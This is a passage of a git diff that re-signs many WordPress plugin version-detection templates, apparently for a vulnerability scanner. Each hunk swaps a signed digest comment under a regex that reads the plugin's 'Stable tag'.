4b0a00483046022100a7e92cfd8d68b7cb13d724e769d7d59dacaefebbe6b0be6695ce56a1fda74370022100a41a70cdfc700046d6ee0752c0455c01b32ba3d9dafc796e04f2c8ac99fe02b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 2604f9c3e9..d0946a8903 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ca725d0a630f0c4baf567cf7f080e7b5fbb18ed2fdf37f2dc9578ee014dfb9d02203018b1183929cff6f60cdb885d839cdf1156f693a286a1a4c4105670df6d5894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210081f26a7ebfe018cd6860bef18ef0826d193d56bc18c9a44336d0f39eea090353022077a86473936b1dfa2bcc5eae945bc003913d7c5036475257a4fc2001b30ab8ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index e4340b56dd..d4d7955a4e 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa2c0002529da695c94b3ba06bbc8143dff9b1a5e9af961c8b40fbdeddef88cb022100e7b5a364b390523873f2f56e608fec8d9f4cf770066c95885635697080434fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220021b129a9e19c1c2e19441f9746331f88e6fabe903d3a3f0eb2dc66784df8a78022100d7e7b1eadf35cb89652710784ec4acc67d78b17cce3532968abeac84856260cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 1d8d89fc40..42929db487 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b779c2f287d2a432ebeb583d6b1c87d5f04ca7ae588b569784298f52d17d4d8f02207a5b4b20d26f8748fe284c5c2243b8d8250b48284a96923f13ca405d8dae32df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220490f1f6ae490f2e5336d35d3da915bd9983cf0647f9557d62758883f044ebcaf02203781adc9a837a175fde03824e57f4d8bb2c8da9f4e651a4c84eb0120031bb395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index e5bf6065b3..5b0b13af5d 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d355598d87156fcc379afd1bdd2b23b13b21c52885edbd5b8d76ba7bb2dbf4be022100f88c84783a0f4b2a051ff8de67deb3d5d89707ca4f5b89bfe7b574da3186ceb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206ad5e21dfc8edad7463fab3ae4ea2ee2392b942aff09906d73fc9113a9a0c284022100f5797a9a4ed907dfe30268c431326becb31e9695526c1a93a4c95de6a84fddc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 3b581e2f27..84d5d2178a 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e4f804809cb4cc48e72d71f1707b9bfda8a5c3f64626601e086d191f15c5e9ab0220607391ed0537ba0710831d3d1171f3df3d5eb239782fe7f9fcd6e368bb3a81d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e517dd02c0dbfa428ef2b6ae12005cfdc92f80e5b46e05f710edd27097fee3b4022100fe92e51e05da54fee14dabb0889016172b177b33a6e55a16100c94a5c7038ad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 2a93c0992b..432b25d3a6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8141a51fcc5c1082873b19d0b2a60269ae18641779c5e08aef177e79bb32057022100994f011de17ab1a88bdaa2e0acd9440de6ac65ab65d01eb3b0632d43c3a1aec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dd3846df53b714db66115d2420220d757edde766204eccff8d0ef028c8d75f0b022078238ba4f1ed7889cf08865b76d59d9ef73e8df97f8e9ec7e77ea7e4e23df323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index f6013eef4a..e64ec4ecf9 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a8a4f30ef4c42783e691b0e4342dcb7a839aae868f95da636b83c5a7e306900022100e9d75294d565010af8e469cf6bfb166bdcc80691c30aae80c9eab6870841690c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008fa8b1b5c990354c52aade3adf524b25bd5ec13c7a0706da51ef53740794024302204139767e37255314e9474c88a6ce0dde7bdc20b2377f6fa37ec26e3885fb82ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index e23b3f8f3a..620eaab60b 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a83a90760d6fcbcd87fec82b630684ebfbf2765c1029435a5477377cf360707022100e9f658957488215e07f67609b3453932c5326bd13ef83468778674dc6a1dc7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207899be2c63a436c5dd1d08cfffb120dd229049b73130483993fcf46e8b4ca21c022064459295572f6dc1422d245bec47f204f9d12af30ff1d2d6f9455d79d5d35ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 4a02cd5474..f684eb1c89 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1d41ea03f609e26dee920f44f0912421fc7933cb6f485cc6e69d539f262d08d0220081b6a78dbf11132a7147acd8f9ea70ea90d5603c6aae89ebb5d22aa53567a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f247f7102103555806c3683a9bbe74d919063e60cc17dd3f2c31024f25540aab02203c1b63d776dd3102e50535c1b26eee9177928820cd50283c6f8d6b366951200c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index a97a72cb89..7773d07859 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e55eaeb60ae4ca2f22cc7b407cee3862721cae6264018b88cf3406b65d5b7015022100b6b22da93d2b9851e1f45426e17b00d3c6cb35e09614acf0e66940ace5162d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203d6ea262682fd99349ebd435652c621bb78f55f970f45c8519694aa09ec46a30022100faa06f3fe37b48ea1069919af9599847ae925189979079deb08192ffd9df1caa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 3057f2fd40..daee7d0123 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097a3b87ca0e551bf8da88323aeef9ebfdaabb07e90f088cc111d8659e41e3145022100d4f0db4a9d8d6280bdc04b2317cec705a5cd6eb87144bcbee38f9c979593e33b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d766bdd45fd42185aa8ff0d579e8de9b4c78e1fd1608cda9e21735f37c524b02022070845ce8f78e76c63b0a68c5e64baaad8aa183670fbd30b7d4aeff645da97e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index ad01516d02..a28558080f 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220534252582cae6f61d67ca1a92e20634f51376336c1e7fc39cc4dbd5c4cc79324022100c130f011bbe9acb51610467ad076f2e0f5949f448f7cd115d461f33c59a10fe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220733fa7cc00cf9dbd1d71c099025cab451e9898cad69e17b1b1330ab46de361f6022100c4d68ad548e871ae95f3327566595adfd65c91e8fdc4aeb2d942e7cbef564121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index ba680d53e9..66504967d5 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9f7933542d5a7727d2e521bdaa91b35c9638fe844d64aded981997ee90fbc29022060869fb4e7894cec5c63dfd6f6606ee4d6f07170f9dbf0acbc80e46b015dfda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220403fd8ad966b8b59ffc9213725f3f0556e9e89d76630b9bbe582bb58c2529c3b02201e17845999696790eaea800d19d8b1ed8f68554a620884f4c71b11de8e3396cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 515601b98b..518ec9f5c6 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc28fbf612a5bd1b5978a9607f67b0b82a93473675e9da3b1de1185089a4cd150220082a655c0354644fe11a018cb6d62d207ba8b8d41db76c8b074e07d818d49ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009f8b5b7adc021ca0208e43b96081a7b569f07fa77cba25f2a6caa1fabcdb3190022050c7158ebe1158338c5c7513341dc95b7efc9107bd8d9e637a2c524b9a8e27d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index eff9a7872c..6f8f87ecd8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100953eb88eee17054bbf77b76b60b00032754b6113039c5b2e72f7bd224ec1fa5e022041e866b5ce4d72bb9af260002c9d0dc1bb4101ea9a4f52fda4cd84f4faa535cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220477fde1dafbaf5093f2959dfb8e491f1fcfc00b41448df6b00b9adb0c0629e8202207b71da58c42864c51d4f0784970369cd98e99f00c5a4186c29d99ba96e82ec18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 05e06d34e3..a82b7519c0 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047999946902587f50ab3b78d7d7a28eb29279ff9b5aef77752226bb6c9814740022100df487466994b0dd477df0bc5ea4382666e7087aa072b2809710444157ad988e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220146e05a2395d1eb2b1b334d82cd91b506c06e493c66fc59005a7f07a616fbb20022003e0fc65c305c15fc3fcfc329353eb10f905227fcb7dcaee98a5f7bc8aba506d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 048380c017..fc7eaea5e0 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203da3216dcd6539291f0a1322b9969f7b0859bc21ce17d542a8934fc76e90eaef02210085e10a2db481f326bb6eb5d6c29ca39fcf6ec56b86d01940608fd72a259f133b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 480a00453043021f22097cec42f03938a452f16e8906640b9bbe91b7746b8eb0b8b12e6dd88627022021c3e76f4d19c54107eefac1b96ccd22b58e41bdac0e18fedb2c1b37042d21f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 832ece4265..fc6c40fc29 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100827fc2d38354a48608c359888157d9de45086cdfba83487fef2717fe1fe72122022100cb86a8a59dd0f0faadb4f44e36d1fb2a6a52f3f6dfa0722a616ed1381d6f00ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b34cfabe6b3fbee887b904899433e8ab29ad6ee623121b4daf5dcf6ae0b6709f022061e987ed5fe6e7b08f75c8e54b816e4e9683cbf189ecac787938f139a2a1af3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 7f54287865..0ee52353d4 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c10fc0138f040be2b46b2ea87ce6120b1574c8914eb022a3405ab21d5b2fe200221008efffd5155b022dc7e477f1760f0cacb7d047a26ec632bf486a2154b75feedca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ff338b1bef07e64184405a8865a1a627957f76b7405b946a8a237279a768d5790220724461e6a6c481a4f42eaeffceeb613e8f4ceb9a46578249f43aa4a4d2a0f20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 63077d17d0..d44c575957 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d4efc84c00a216aae3b7c338780cd7df102f39511ad74fb3cb49f8a235e2b436022036d362440cfd42d38fab4e845170d30d321dda2beae9736a3993737c2667e964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fab95c3024ad0c1225591e886039e9abfc92593081ea823a31d36fc2aa613c39022100b111e9bc54dbc8d8eb885ff59e160f28c37fc239a86ca6ea5349adc5fb6ce3af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index ad5a3a7339..95411841a1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd27e33e84f926d0d0b17fa310823cdb0376efd2760d2c115863c5c2cf8e74ae0220392b53caccea46fc9efe187803dc6869cedfc32d1d98d93c3d2b3ff4117b090b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e8837d054f7c9ed3ae16767d2849e0322982cf967036ebd0ad771b85d10aa3aa022100aba799d8d1a98daa6fc5a49fd403cbf55c387d68c01e23c25deb180f2d39fa34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 3e09b0c0cb..6862b86a13 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd00dd8395764360a0c9e39ddd0f4d8a2e8507d690f3f6a4e6938d66362ad26d0220034659d1084044cb2a14fb2f38dca480d3c24557a75e09fa596d335446be7565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ba25255ef0ba6dcdaee6e6feff1c992f0d71c48c39a5d08da55958c39d089166022034c4da9febaff539ae6f06f3d3d3d98fba1c7867ede713b5d3edc1d365478e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 839e1f513e..ea1f1c9c47 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202580c8f7d773c5033007eb8e645c12186078d8d2dd4a3e56b331f57ee506f958022034169e8e34995e605d8fe3df392f3d155546097cf9d685171cff247be61e1242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100888cc5083bd2177b124be13dcb11b70df6430452cc294ef47946522000ac9d76022100d1d20a7d01a1495172642877cd40dc37027a9b580d7ac48bb2c2bccf512164f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 200ff9c483..25213a16c0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077493d5f77ab8ea53cec63723313e623ac46fef79722f28f69c4b75b12c669c302207a93ecf602085a768ce1f323bbd4f494735849e495b4ab9dc495e262cfc52603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210085356775d11286e3006c47afe3de1d61566d4294f975534de3b4f6cb7d45ec5102203b63e78d87211c0570333e399278fed818de7af62b994a60c51186009f8ef855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 524e823cc6..8911118509 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3265513fe4ae3a728bc7aca696be36219d3eaed90e61bc07b02b75146ff75dd0220104370e6aa9f3262cfc08c24da9cbafb43cd1ec37bbf801499df6f5f4dce672f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022008c965f3b3289f81b1004e1b9a3e9082048f40cf2ee5a60ad61412d638641bd202204ac6b4e27d9ce3692363c1abcf59f8c08f394cf512e06c3f1071063ee976cedb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index a6f0055eb1..9bb148c59d 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af17cd8a98f2fe63879b06f245df6d402e75bef453c1eed787a96fa5bc6c912002200c0fea6840d6bf1e7f0661100f1d391f4273c1c023dfec74f0c268b3f61fa5f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d1977c3d659472b899c3da97826dcf528d6deb9ebea156b8505fa4bd168ccb0c02201c25d477652539e3a388dbbb118bc2b6b68a71d431a4ce5cdf4b29a7060153f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 8565743408..c1e039997d 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2c5dc01ecaf7df6cf2f3ce2ffe6cdbe81bb862c3d9ee9dac4d36c7658950653022100b1ee60b86f6bc947d2c6495a355954f3bc31ddbd4307bd564ebe461035a09ae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201449b6a53bb9916b3b4b53a90feeea85667b9e551a294665fa943006196ca320022010dfb6c8eb3b8c2fcc9139ef3de4e0ea39ee11e5e3158cc1a0b62393c7aae13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f30feb9ca..37acd605f4 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a227a7af6b2b655af9a56de0ecf3a495fc5ca672a03bbb57ed08a68f286ec216022100ec4139627043c707ab82849a4ad2605e2a5797038f4898aa4a9e19cd03b4254c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207782107386e506ed3499a04eff158814d457209ad137a1ce80720cbdc68bdaa1022100b00575bb953c2d0040ad12fffb903f75142f66391716849645663d937a66f3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 70577b701a..121ff56050 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f89a99a67b9f7b84912b8c48ebf281440d93fe45506ed2639f72a72007e8232f022100f7b9648444782f6ec9add847eb9f320b5ba3a4dd7731b9ef71fde4965704ebf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210084b9400ec71731acb1c168c026f84811503f30141447bbd8ddf9f1b2308330c70220116de967be8a575f28e975ba22387a3d8147d726ddec8d95e345cafd358b007d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7896213537..15f4bfb266 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a0af08f7c79410f1273753cef1074fb2d97ad8828ab634fe5bd2e2436aa5b570220159aedf13d0f78aadfb741f0e7ef491b49eca8cfa41b7be0b7c3b10951cc37f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210091360508cda65ed455fdc902b9d706bdd06463a16a82bf6e8e80e9e8ec8ae725022100f83e4706f81bb992fe089c26e21b60545b01d3682846fc488dad59f91ca61aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 6b27592c80..8e8efbc0b5 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e26586d926f6fb2c1277508588537c42773db09436568dfe82060ade8db519f7022011f12196abad502b7362dffc72e7ee3e09006c0d9d82e6900220c88aaf461235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022072516a84bc4ed3b4bf5482e861c6a78cdf313e89b1a8e187401a6d1419e971b7022100bb9ffaacb940a5a43058e8f57004ffa4c4a4eb9159126d963a14b1514eb6f94f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index d44cb631c3..e382d00f87 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100baaf88d3ed0d7f5209a8b842c647b574958157cefe2485e518f8d521229ceb4b02210097e9e26c943453bfe335563bee674697f363ccf244995c0e2656254ca70bb783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022054418a55713e0193dffc4832bf5953fcab1be841175f54e6c7b134142bdcdbdc0221009273d960b8d8b8090124aa5be0a100623a86e46191f681b7ea95fc4d46e136c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 7950e0e364..6f37484e7d 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058d30e22394ac8dde91682ec4f2ffb1e7cbce47d4dbf988311533e7426bc00310220314fb8fc7e04c66f5e62c383928ffccc2462e1ee862dd87d57c4c62d1a612cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 